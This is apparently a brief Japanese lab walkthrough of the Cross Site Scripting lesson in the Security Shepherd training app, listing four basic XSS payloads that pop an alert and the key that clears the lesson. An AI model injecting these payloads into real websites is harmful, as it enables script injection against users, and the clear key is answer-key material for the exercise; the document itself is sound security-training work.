Hello there, ('ω')ノ
ShepherdでCross Site Scriptingを選択して。
ここでは4つの基本的なXSSのパターンが書かれていて。
これまでやられサイトで演習をしてきた方からすると記憶にあるかと。
下記を入力するとスクリプトが実行されてポップアップが表示されて。
<SCRIPT>alert('XSS')</SCRIPT>
下記を入力するとエラーが発生してスクリプトが実行されて。
<IMG SRC="#" ONERROR="alert('XSS')"/>
下記を入力すると下にボタンが表示されクリックするとスクリプトが実行されて。
<INPUT TYPE="BUTTON" ONCLICK="alert('XSS')"/>
下記を入力すると下にフレームが表示される前にスクリプトが実行されて。
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
得られた下記のキーを入力するとクリアできた。
ToSFvtHPQdG4RZS2Fh0rT861m/U44hAm840bwAKH7XCGJphATN5EMcfkfohq/Eugr7nQlip+okZvCtvUUysM0WWXu00Tt1rfpV/TZrqUN+saotP1NsEGfgIf44nHCrWF
Best regards, (^^ゞ